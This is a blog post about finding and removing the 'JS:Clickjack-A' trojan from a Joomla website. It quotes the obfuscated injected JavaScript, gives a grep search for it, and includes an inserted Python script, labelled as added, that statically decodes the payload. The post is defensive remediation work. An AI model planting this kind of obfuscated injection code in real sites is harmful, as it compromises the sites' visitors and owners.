• How to remove JS:Clickjack-A [Trj] from my [yours] website

    Posted on August 8th, 2013 admin 8 comments

    Hello,

    It has been a long time since I posted to this blog; I have been really busy at work, but this subject really deserves a post.

    This week I received an e-mail from a customer of a site I built, claiming that the website was infected with a virus. My first thought was “Newbie User”. I accessed the website just to check whether everything was running fine, the way I thought it was.

    A few days later I accessed the same site from another computer running “Avast Antivirus” and received an alert: “JS:ClickJack-A [Trj] Detected from website…”. In my mind, Joomla had a bug, and because I don't update Joomla very frequently (never), I got hacked.

    But now what? How do I remove JS:Clickjack-A from my site?

    Well, that's not so hard. First of all, I found part of the malicious code on the internet:

    function dnnViewState()
    {
    var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
    t=z='';
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
    </script>

    After that I connected as root to my server and ran the following command in the root folder of the site.

    grep -RnisI "}document.write(" *

    This command recursively searches all files for the string "}document.write(". This string is part of the hacker's code, but it can also be found on other pages.

    When I found the page with the malicious code I got really angry: it was in a Joomla plugin called “AutsonSlideShow”. I then deactivated the plugin in my Joomla panel and my site was fixed.

    Maybe your problem is not in this plugin, or your website does not run on Joomla, but that's no problem: you can use the same command to find the malicious code. If you don't have root access to the server, you can download all your site's pages to your computer and run the same search there, or you can check for the most recently modified files.
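
    Because the grep string also matches legitimate pages, a hit needs confirming. The following script is an added example, not code from the original post: it statically decodes the numeric strings of the snippet quoted above, without executing any JavaScript, and reports only the files that carry that decoder. The function names, the regular expressions and the single-quoted array layout are assumptions based on that one sample.

```python
import os
import re
import sys

# Constructed sample: array literal and decoder expression from the quoted snippet.
SAMPLE = ("x=new Array('9091968376',"
          "'8887918192818786347374918784939277359287883421333333338896',"
          "'778787','949990793917947998942577939317'),l=x.length;"
          "z+=String.fromCharCode(parseInt(t)+25-l+a);")

# Assumed layout: single-quoted digit strings, offset written as N-l+a.
ARRAY_RE = re.compile(r"new Array\(\s*('\d+'(?:\s*,\s*'\d+')*)\s*\)")
OFFSET_RE = re.compile(r"parseInt\(\w+\)\+(\d+)-\w+\+\w+")


def decode_payload(js_source):
    """Decode the hidden strings statically; return [] if the decoder is absent."""
    array = ARRAY_RE.search(js_source)
    offset = OFFSET_RE.search(js_source)
    if not array or not offset:
        return []
    base = int(offset.group(1))
    decoded = []
    # x[l-a] is handled on pass a with shift N-l+a, so index i is shifted by N-i.
    # String.fromCharCode keeps only the low 16 bits of the code.
    for i, digits in enumerate(re.findall(r"'(\d+)'", array.group(1))):
        pairs = [digits[j:j + 2] for j in range(0, len(digits) - 1, 2)]
        decoded.append("".join(chr((int(p) + base - i) & 0xFFFF) for p in pairs))
    return decoded


def scan_tree(root):
    """Return [(path, decoded strings)] for each file that carries the decoder."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    decoded = decode_payload(handle.read())
            except OSError:
                continue  # unreadable file: skip it and keep scanning
            if decoded:
                hits.append((path, decoded))
    return hits


if __name__ == "__main__":
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else decode_payload(SAMPLE))
```

    Run it with the site's root folder as its argument; with no argument it decodes the embedded sample.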

    If you need help, just leave a comment on this post.

     
